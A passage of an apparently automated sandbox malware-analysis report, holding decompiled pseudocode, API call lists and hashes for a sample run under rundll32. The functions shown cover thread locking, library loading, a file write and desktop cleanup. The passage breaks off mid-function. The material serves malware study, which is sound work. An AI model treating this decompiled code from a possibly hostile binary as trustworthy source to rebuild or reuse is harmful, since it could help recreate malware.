                                                            					 *((intOrPtr*)(_t41 + 0x180)) =  *((intOrPtr*)(_t41 + 0x180)) +  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x14));
                                                            					_t39 =  *((intOrPtr*)(_t40 + 4));
                                                            					 *((intOrPtr*)(_t40 + 4)) = 0;
                                                            					_t27 =  *((intOrPtr*)(_t41 + 0x16c));
                                                            					if(_t27 == 0) {
                                                            						 *((intOrPtr*)(_t39 + 8)) = 0;
                                                            						 *((intOrPtr*)(_t39 + 4)) = 0;
                                                            						 *((intOrPtr*)(_t41 + 0x168)) = _t39;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t27 + 4)) = _t39;
                                                            						 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t41 + 0x16c));
                                                            					}
                                                            					 *((intOrPtr*)(_t41 + 0x164)) =  *((intOrPtr*)(_t41 + 0x164)) + 1;
                                                            					 *((intOrPtr*)(_t41 + 0x16c)) = _t39;
                                                            					LeaveCriticalSection(_t42);
                                                            					if(_t33 == 0 &&  *((intOrPtr*)(_t41 + 0x180)) > 0) {
                                                            						SetEvent( *(_t41 + 0x174));
                                                            					}
                                                            					return 0;
                                                            				} else {
                                                            					LeaveCriticalSection(_t42);
                                                            					return 0x139f;
                                                            				}
                                                            			}


                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464EAFE
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464EB10
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464EB7D
                                                            • SetEvent.KERNEL32(?,?,0464E994,?,?,00000000,?,?,00000000), ref: 0464EB97
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                            • String ID:
                                                            • API String ID: 3394196147-0
                                                            • Opcode ID: 0dae0d1b890a939e4adfccd3870111d4458057d4cfbb6745bfc25b038ae5fbf2
                                                            • Instruction ID: a7579d8c9c49a66ad67229d44514738858670e0cab57064c34ca8f754addc1c0
                                                            • Opcode Fuzzy Hash: 0dae0d1b890a939e4adfccd3870111d4458057d4cfbb6745bfc25b038ae5fbf2
                                                            • Instruction Fuzzy Hash: 14111671200605EFD7088F69D988BE6FBA8FF59314F05826AE51D8B311EB36E851CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04668FF4(signed int _a4) {
                                                            				signed int _t9;
                                                            				void* _t13;
                                                            				signed int _t15;
                                                            				WCHAR* _t22;
                                                            				signed int _t24;
                                                            				signed int* _t25;
                                                            				void* _t27;
                                                            
                                                            				_t9 = _a4;
                                                            				_t25 = 0x4687570 + _t9 * 4;
                                                            				_t24 =  *_t25;
                                                            				if(_t24 == 0) {
                                                            					_t22 =  *(0x4679d30 + _t9 * 4);
                                                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                            					if(_t27 != 0) {
                                                            						L8:
                                                            						 *_t25 = _t27;
                                                            						if( *_t25 != 0) {
                                                            							FreeLibrary(_t27);
                                                            						}
                                                            						_t13 = _t27;
                                                            						L11:
                                                            						return _t13;
                                                            					}
                                                            					_t15 = GetLastError();
                                                            					if(_t15 != 0x57) {
                                                            						_t27 = 0;
                                                            					} else {
                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                            						_t27 = _t15;
                                                            					}
                                                            					if(_t27 != 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						 *_t25 = _t15 | 0xffffffff;
                                                            						_t13 = 0;
                                                            						goto L11;
                                                            					}
                                                            				}
                                                            				_t4 = _t24 + 1; // 0xd355be4f
                                                            				asm("sbb eax, eax");
                                                            				return  ~_t4 & _t24;
                                                            			}
                                                            0x04668ff9
                                                            0x04668ffd
                                                            0x04669004
                                                            0x04669008
                                                            0x04669016
                                                            0x0466902c
                                                            0x04669030
                                                            0x04669059
                                                            0x0466905b
                                                            0x0466905f
                                                            0x04669062
                                                            0x04669062
                                                            0x04669068
                                                            0x0466906a
                                                            0x00000000
                                                            0x0466906b
                                                            0x04669032
                                                            0x0466903b
                                                            0x0466904a
                                                            0x0466903d
                                                            0x04669040
                                                            0x04669046
                                                            0x04669046
                                                            0x0466904e
                                                            0x00000000
                                                            0x04669050
                                                            0x04669053
                                                            0x04669055
                                                            0x00000000
                                                            0x04669055
                                                            0x0466904e
                                                            0x0466900a
                                                            0x0466900f
                                                            0x00000000

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId), ref: 04669026
                                                            • GetLastError.KERNEL32(?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId,0467A1F0,GetCurrentPackageId,00000000), ref: 04669032
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId,0467A1F0,GetCurrentPackageId,00000000), ref: 04669040
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 7e9b0b117b23ea2a747f393bbb9297a7ef6f9bbdade63f0c0d7e4a8a4e9c3c36
                                                            • Instruction ID: d556272c01c843d0661df7a01ba09b50e83eb4d17fb076d7cb7713cd26c96742
                                                            • Opcode Fuzzy Hash: 7e9b0b117b23ea2a747f393bbb9297a7ef6f9bbdade63f0c0d7e4a8a4e9c3c36
                                                            • Instruction Fuzzy Hash: C201D872711226DBCB2149799C44A567798EB55B617140528ED1BD7240FB34E809C6E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04652920(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t25;
                                                            				void _t29;
                                                            				long _t32;
                                                            				intOrPtr _t37;
                                                            				intOrPtr _t39;
                                                            				intOrPtr _t48;
                                                            				struct _CRITICAL_SECTION* _t49;
                                                            				struct _CRITICAL_SECTION* _t52;
                                                            
                                                            				_t39 = __ecx;
                                                            				_t48 = _a4;
                                                            				_v12 = __ecx;
                                                            				_v8 = 0;
                                                            				if(_t48 == 0 ||  *((intOrPtr*)(_t48 + 0x30)) == 0) {
                                                            					return _t25;
                                                            				} else {
                                                            					_t5 = _t48 + 0x54; // 0x54
                                                            					_t52 = _t5;
                                                            					 *((intOrPtr*)(_t48 + 0x48)) = 0;
                                                            					EnterCriticalSection(_t52);
                                                            					_t49 = _t48 + 0x6c;
                                                            					EnterCriticalSection(_t49);
                                                            					_t37 = _a4;
                                                            					if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
                                                            						 *((intOrPtr*)(_t37 + 0x30)) = 0;
                                                            						_v8 = 1;
                                                            					}
                                                            					LeaveCriticalSection(_t49);
                                                            					_t29 = LeaveCriticalSection(_t52);
                                                            					if(_v8 != 0) {
                                                            						_t54 = _v12;
                                                            						_push(_t39);
                                                            						L04652B90(_v12, _t37, _a8, _a12, _a16);
                                                            						E046551B0(_t37, _t54 + 0x178, LeaveCriticalSection, _t54,  *((intOrPtr*)(_t37 + 4)), 0);
                                                            						_t32 = timeGetTime();
                                                            						_t42 = _t37 + 0x8c;
                                                            						 *((intOrPtr*)(_t37 + 0x34)) = _t32;
                                                            						E04655420( *((intOrPtr*)(_t37 + 0x98)), _t42);
                                                            						E04655860(_t54 + 0x378,  *((intOrPtr*)(_t54 + 0x1c)), 0);
                                                            						_t29 = E0464C930(_t54 + 0x2b4, _t37);
                                                            						if(_t29 == 0) {
                                                            							_t29 = E04654CA0(_t54 + 0x378, _t37);
                                                            						}
                                                            					}
                                                            					return _t29;
                                                            				}
                                                            			}

                                                            0x04652920
                                                            0x04652927
                                                            0x0465292a
                                                            0x0465292d
                                                            0x04652936
                                                            0x046529ff
                                                            0x04652946
                                                            0x0465294e
                                                            0x0465294e
                                                            0x04652951
                                                            0x04652959
                                                            0x0465295b
                                                            0x0465295f
                                                            0x04652961
                                                            0x04652968
                                                            0x0465296a
                                                            0x04652971
                                                            0x04652971
                                                            0x0465297f
                                                            0x04652982
                                                            0x04652988
                                                            0x0465298a
                                                            0x0465298d
                                                            0x0465299a
                                                            0x046529ad
                                                            0x046529b2
                                                            0x046529b8
                                                            0x046529be
                                                            0x046529c5
                                                            0x046529d5
                                                            0x046529e4
                                                            0x046529eb
                                                            0x046529f4
                                                            0x046529f4
                                                            0x046529eb
                                                            0x00000000
                                                            0x046529fa

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                            • RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • RtlLeaveCriticalSection.NTDLL(-0000006C), ref: 0465297F
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04652982
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3168844106-0
                                                            • Opcode ID: ea339d3d356f79625df54b3e9ecb61047bf36dcc714c0767631637daad35a84a
                                                            • Instruction ID: 59a4a41bbcca40a4f1511c73c10f6b85b312f44a73af99dfa0290a005a90a2da
                                                            • Opcode Fuzzy Hash: ea339d3d356f79625df54b3e9ecb61047bf36dcc714c0767631637daad35a84a
                                                            • Instruction Fuzzy Hash: 2C018032400204BBDB15AF5AEC98BDABB78FF54314F144159FD0463360E774B955DAA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E0464A160(WCHAR* __ecx) {
                                                            				long _v8;
                                                            				void* _t14;
                                                            				struct _OVERLAPPED* _t17;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				if(__ecx == 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t14 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                                            					if(_t14 != 0xffffffff) {
                                                            						SetFilePointer(_t14, 0, 0, 0);
                                                            						E0464A110();
                                                            						_v8 = 0;
                                                            						WriteFile(_t14, 0x4684d18, 0x1600,  &_v8, 0);
                                                            						_t17 =  !=  ? 1 : 0;
                                                            						CloseHandle(_t14);
                                                            					}
                                                            					return _t17;
                                                            				}
                                                            			}

                                                            0x0464a163
                                                            0x0464a165
                                                            0x0464a169
                                                            0x0464a1d0
                                                            0x0464a16b
                                                            0x0464a182
                                                            0x0464a187
                                                            0x0464a18d
                                                            0x0464a193
                                                            0x0464a19c
                                                            0x0464a1ab
                                                            0x0464a1b9
                                                            0x0464a1bc
                                                            0x0464a1bc
                                                            0x0464a1c9
                                                            0x0464a1c9

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,76A1ED80,76A1F660,?,?,0464A916), ref: 0464A17C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0464A916), ref: 0464A18D
                                                            • WriteFile.KERNEL32(00000000,04684D18,00001600,0464A916,00000000,?,0464A916), ref: 0464A1AB
                                                            • CloseHandle.KERNEL32(00000000,?,0464A916), ref: 0464A1BC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID:
                                                            • API String ID: 3604237281-0
                                                            • Opcode ID: 27a9585c058060e2a8b620dde3b79af961cbea841d797e64977d2899c742979b
                                                            • Instruction ID: 3d0b0e26327d8dfe7fc6f44d17207bfe5977af0aa25f5b4d2ddf7b33ad3f3ff4
                                                            • Opcode Fuzzy Hash: 27a9585c058060e2a8b620dde3b79af961cbea841d797e64977d2899c742979b
                                                            • Instruction Fuzzy Hash: 91F0683174222477D73456666C0DFEB7E9CDF86BB2F000259B90DD2180EA655C0186E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 19%
                                                            			E04672289(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            				intOrPtr _t30;
                                                            				intOrPtr* _t32;
                                                            				void* _t34;
                                                            
                                                            				_t29 = __edx;
                                                            				_t27 = __ebx;
                                                            				_t36 = _a28;
                                                            				_t30 = _a8;
                                                            				if(_a28 != 0) {
                                                            					_push(_a28);
                                                            					_push(_a24);
                                                            					_push(_t30);
                                                            					_push(_a4);
                                                            					E046728D8(_t36);
                                                            					_t34 = _t34 + 0x10;
                                                            				}
                                                            				_t37 = _a40;
                                                            				_push(_a4);
                                                            				if(_a40 != 0) {
                                                            					_push(_a40);
                                                            				} else {
                                                            					_push(_t30);
                                                            				}
                                                            				E04671D8F(_t28);
                                                            				_t32 = _a32;
                                                            				_push( *_t32);
                                                            				_push(_a20);
                                                            				_push(_a16);
                                                            				_push(_t30);
                                                            				E04672ADA(_t27, _t28, _t29, _t30, _t37);
                                                            				_push(0x100);
                                                            				_push(_a36);
                                                            				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                            				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                            				_push(_a20);
                                                            				_push(_a12);
                                                            				_push(_t30);
                                                            				_push(_a4);
                                                            				_t25 = E04672093(_t29, _t32, _t37);
                                                            				if(_t25 != 0) {
                                                            					E04671D5D(_t25, _t30);
                                                            					return _t25;
                                                            				}
                                                            				return _t25;
                                                            			}

                                                            0x04672289
                                                            0x04672289
                                                            0x0467228c
                                                            0x04672291
                                                            0x04672294
                                                            0x04672296
                                                            0x04672299
                                                            0x0467229c
                                                            0x0467229d
                                                            0x046722a0
                                                            0x046722a5
                                                            0x046722a5
                                                            0x046722a8
                                                            0x046722ac
                                                            0x046722af
                                                            0x046722b4
                                                            0x046722b1
                                                            0x046722b1
                                                            0x046722b1
                                                            0x046722b7
                                                            0x046722bd
                                                            0x046722c0
                                                            0x046722c2
                                                            0x046722c5
                                                            0x046722c8
                                                            0x046722c9
                                                            0x046722d2
                                                            0x046722d7
                                                            0x046722da
                                                            0x046722e0
                                                            0x046722e3
                                                            0x046722e6
                                                            0x046722e9
                                                            0x046722ea
                                                            0x046722ed
                                                            0x046722f8
                                                            0x046722fc
                                                            0x00000000
                                                            0x046722fc
                                                            0x04672303

                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 046722A0
                                                              • Part of subcall function 046728D8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 04672907
                                                              • Part of subcall function 046728D8: ___AdjustPointer.LIBCMT ref: 04672922
                                                            • _UnwindNestedFrames.LIBCMT ref: 046722B7
                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 046722C9
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 046722ED
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                            • String ID:
                                                            • API String ID: 2901542994-0
                                                            • Opcode ID: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                            • Instruction ID: e1fc7f7a3c80c03dcc5ce0f7c6c7c63ca25664fb2366948891cffce9cf57f196
                                                            • Opcode Fuzzy Hash: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                            • Instruction Fuzzy Hash: 34012932000108BBDF125F55CC10EDA3BBAEF59714F148159FE5865220E332F4A1DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E04651970(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                            				long _t14;
                                                            				long _t18;
                                                            				void* _t22;
                                                            				intOrPtr* _t23;
                                                            				intOrPtr* _t27;
                                                            				intOrPtr _t29;
                                                            
                                                            				_t23 = __ecx;
                                                            				_t22 = __ebx;
                                                            				_t27 = __ecx;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _a4;
                                                            				 *((intOrPtr*)(__ecx + 8)) = _a8;
                                                            				if( *0x4687b70 == 0) {
                                                            					 *0x4687b70 = timeGetTime();
                                                            				}
                                                            				_t14 = InterlockedIncrement(0x4687b70);
                                                            				if(_t14 == 0) {
                                                            					_t14 = InterlockedIncrement(0x4687b70);
                                                            				}
                                                            				_t29 = _a12;
                                                            				 *(_t27 + 0x1c) = _t14;
                                                            				E04651A00(_t22, _t27, _t29);
                                                            				 *((intOrPtr*)( *_t27))(_t29, _t23);
                                                            				_t18 = timeGetTime();
                                                            				 *(_t27 + 0x18) = _t18;
                                                            				 *(_t27 + 0x10) = _t18;
                                                            				 *((intOrPtr*)(_t27 + 0x14)) = 0;
                                                            				 *((intOrPtr*)(_t27 + 0xc)) = 0;
                                                            				 *((intOrPtr*)(_t27 + 0x24)) = 1;
                                                            				E04651DE0(_t27);
                                                            				return _t27;
                                                            			}

                                                            APIs
                                                            • timeGetTime.WINMM ref: 0465198C
                                                            • InterlockedIncrement.KERNEL32(04687B70), ref: 046519A2
                                                            • InterlockedIncrement.KERNEL32(04687B70), ref: 046519AD
                                                            • timeGetTime.WINMM ref: 046519C5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: IncrementInterlockedTimetime
                                                            • String ID:
                                                            • API String ID: 159728177-0
                                                            • Opcode ID: 6911bd172f05b2e1d374718367b4ba786588c5985ac879ae3fb02bf9cac0927d
                                                            • Instruction ID: cd9b9c530db833bd57b3b17ce553b8b5d5f92c12a093a52095c39c5d19da9d3d
                                                            • Opcode Fuzzy Hash: 6911bd172f05b2e1d374718367b4ba786588c5985ac879ae3fb02bf9cac0927d
                                                            • Instruction Fuzzy Hash: 5A012975A00205AFD704DF69D818749BBF9FF89251F00421AE814C3610EBB4A850CFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046520F0(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				void* _t7;
                                                            				intOrPtr* _t9;
                                                            				intOrPtr _t12;
                                                            				struct _CRITICAL_SECTION* _t15;
                                                            
                                                            				_t12 = _a4;
                                                            				_t9 = __ecx;
                                                            				_t2 = _t12 + 0x54; // 0x54
                                                            				_t15 = _t2;
                                                            				EnterCriticalSection(_t15);
                                                            				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x30)) == 0) {
                                                            					LeaveCriticalSection(_t15);
                                                            					return 2;
                                                            				} else {
                                                            					SetLastError(0);
                                                            					_t7 =  *((intOrPtr*)( *_t9 + 0xdc))(_t12);
                                                            					LeaveCriticalSection(_t15);
                                                            					return _t7;
                                                            				}
                                                            			}

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 046520FF
                                                            • SetLastError.KERNEL32(00000000,?,80004005,80004005,?,?,04652885,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04652111
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04652125
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0465213A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterErrorLast
                                                            • String ID:
                                                            • API String ID: 3832147951-0
                                                            • Opcode ID: 38177e629f31cfa67bb8f68fabf30c90efe30683ae570cb627922984ae3f64c5
                                                            • Instruction ID: 0409c3cfaa3a2b45df0af3a75386d9b1564608c7858396a609a04a3340e85991
                                                            • Opcode Fuzzy Hash: 38177e629f31cfa67bb8f68fabf30c90efe30683ae570cb627922984ae3f64c5
                                                            • Instruction Fuzzy Hash: 0DF01D36301214ABD3185A9AA84CAAAB76DEB95676F154036FB09C32009B75981586B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04636820(intOrPtr* __ecx) {
                                                            				int _t14;
                                                            				intOrPtr* _t16;
                                                            
                                                            				_t16 = __ecx;
                                                            				 *__ecx = 0x467df68;
                                                            				CloseDesktop( *(__ecx + 0xc));
                                                            				DeleteDC( *(_t16 + 0x18));
                                                            				ReleaseDC(0,  *(_t16 + 0x14));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x10)));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x88)));
                                                            				L04655B0F( *((intOrPtr*)(_t16 + 0x84)));
                                                            				 *_t16 = 0x467e8b0;
                                                            				_t14 = CloseHandle( *(_t16 + 8));
                                                            				 *_t16 = 0x467e8c0;
                                                            				return _t14;
                                                            			}

                                                            APIs
                                                            • CloseDesktop.USER32(?,?,046367FB), ref: 0463682C
                                                            • DeleteDC.GDI32(?), ref: 04636835
                                                            • ReleaseDC.USER32(00000000,?), ref: 04636840
                                                            • CloseHandle.KERNEL32(?), ref: 04636870
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteDesktopHandleRelease
                                                            • String ID:
                                                            • API String ID: 3596899788-0
                                                            • Opcode ID: 40ca2cd78760006a6d3badd95cfd8ddf286dbc3cff0b6f5dd0a0d3b4b2768bc1
                                                            • Instruction ID: 2df53be4ded47ea0eea13cc6b7ba3e15dc3e1ac3d19eff855a245467fb088d14
                                                            • Opcode Fuzzy Hash: 40ca2cd78760006a6d3badd95cfd8ddf286dbc3cff0b6f5dd0a0d3b4b2768bc1
                                                            • Instruction Fuzzy Hash: 19F01531100701EFEB262F60ED0CA46BBB1FF04205F00592DE99B51574FB366894EB15
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E046406C0(signed int _a4, signed int _a8, char _a12) {
                                                            				intOrPtr* _v0;
                                                            				intOrPtr _v12;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				signed int _v32;
                                                            				intOrPtr _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				signed int _t75;
                                                            				signed int _t79;
                                                            				intOrPtr* _t86;
                                                            				unsigned int _t115;
                                                            				signed int _t117;
                                                            				signed int _t118;
                                                            				signed int _t122;
                                                            				signed int _t140;
                                                            				intOrPtr _t142;
                                                            				signed int* _t146;
                                                            				signed int* _t148;
                                                            				signed int _t149;
                                                            				signed int _t158;
                                                            				void* _t160;
                                                            				void* _t161;
                                                            				signed int _t162;
                                                            				signed int _t164;
                                                            				signed int _t167;
                                                            				signed int _t169;
                                                            				signed int _t175;
                                                            				signed int _t182;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				signed int _t189;
                                                            				void* _t191;
                                                            				signed int _t193;
                                                            				unsigned int _t195;
                                                            				signed int _t196;
                                                            				signed int _t199;
                                                            				intOrPtr _t200;
                                                            				intOrPtr _t205;
                                                            
                                                            				_t75 = _a4;
                                                            				if(_t75 != 0) {
                                                            					__eflags = _t75 - 0x3fffffff;
                                                            					if(__eflags > 0) {
                                                            						E04656A13(__eflags);
                                                            						goto L8;
                                                            					} else {
                                                            						_t140 = _t75 << 2;
                                                            						__eflags = _t140 - 0x1000;
                                                            						if(__eflags < 0) {
                                                            							return L04655B14(_t187, __eflags, _t140);
                                                            						} else {
                                                            							_t2 = _t140 + 0x23; // 0x23
                                                            							_t148 = _t2;
                                                            							__eflags = _t148 - _t140;
                                                            							if(__eflags <= 0) {
                                                            								L8:
                                                            								E04656A13(__eflags);
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								_push(0xffffffff);
                                                            								_push(0x4672e80);
                                                            								_push( *[fs:0x0]);
                                                            								_t200 = _t199 - 0x18;
                                                            								_push(_t187);
                                                            								_t79 =  *0x4684008; // 0xd355be4e
                                                            								_push(_t79 ^ _t199);
                                                            								 *[fs:0x0] =  &_v20;
                                                            								_v24 = _t200;
                                                            								_t146 = _t148;
                                                            								_t149 = _a4;
                                                            								_v44 = _t149 -  *_t146 >> 2;
                                                            								_t182 = _a8;
                                                            								__eflags = _t182;
                                                            								if(_t182 != 0) {
                                                            									_t189 = _t146[2];
                                                            									_t169 = _t146[1];
                                                            									_a8 = _t169;
                                                            									__eflags = _t189 - _t169 >> 2 - _t182;
                                                            									if(_t189 - _t169 >> 2 >= _t182) {
                                                            										_push(_t149);
                                                            										_push(_a4);
                                                            										_push(_t149);
                                                            										__eflags = _t169 - _t149 >> 2 - _t182;
                                                            										_a12 =  *_a12;
                                                            										if(_t169 - _t149 >> 2 >= _t182) {
                                                            											_t191 = _t169 - (_t182 << 2);
                                                            											_t146[1] = E04640A00(_t191, _t169, _t169);
                                                            											__eflags = _a8 - _t191 - _a4;
                                                            											E0465D060(_a8 - _t191 - _a4, _a4, _t191 - _a4);
                                                            											E04640950(_a4, (_t182 << 2) + _a4,  &_a12);
                                                            										} else {
                                                            											_t193 = _t182 * 4;
                                                            											E04640A00(_t149, _t169, _t193 + _t149);
                                                            											_v12 = 2;
                                                            											_push(_a4);
                                                            											_push(_t146[1]);
                                                            											E04640990(_t146[1], _t182 - (_t146[1] - _a4 >> 2),  &_a12);
                                                            											_v12 = 0xffffffff;
                                                            											_t146[1] = _t146[1] + _t193;
                                                            											E04640950(_a4, _t146[1] - _t193,  &_a12);
                                                            										}
                                                            									} else {
                                                            										_t158 =  *_t146;
                                                            										_t175 = _t169 - _t158 >> 2;
                                                            										__eflags = 0x3fffffff - _t175 - _t182;
                                                            										if(__eflags < 0) {
                                                            											_push("vector<T> too long");
                                                            											E04656A30(__eflags);
                                                            										}
                                                            										_a8 = _t175 + _t182;
                                                            										_t195 = _t189 - _t158 >> 2;
                                                            										_t115 = _t195 >> 1;
                                                            										__eflags = 0x3fffffff - _t115 - _t195;
                                                            										_t160 =  >=  ? _t115 + _t195 : 0;
                                                            										_t117 = _a8;
                                                            										__eflags = _t160 - _t117;
                                                            										_t118 =  >=  ? _t160 : _t117;
                                                            										_a8 = _t118;
                                                            										_v36 = _t118;
                                                            										_push(_t118);
                                                            										_t196 = E046406C0();
                                                            										_v40 = _t196;
                                                            										_t122 = _a4 -  *_t146 >> 2;
                                                            										_v32 = _t122;
                                                            										_v12 = 0;
                                                            										_t161 = _t196 + _t122 * 4;
                                                            										_push(_a4);
                                                            										_push(_t161);
                                                            										E04640990(_t161, _t182, _a12);
                                                            										_v28 = 1;
                                                            										_t205 = _t200 + 8;
                                                            										_a12 = _t205;
                                                            										_push(_a4);
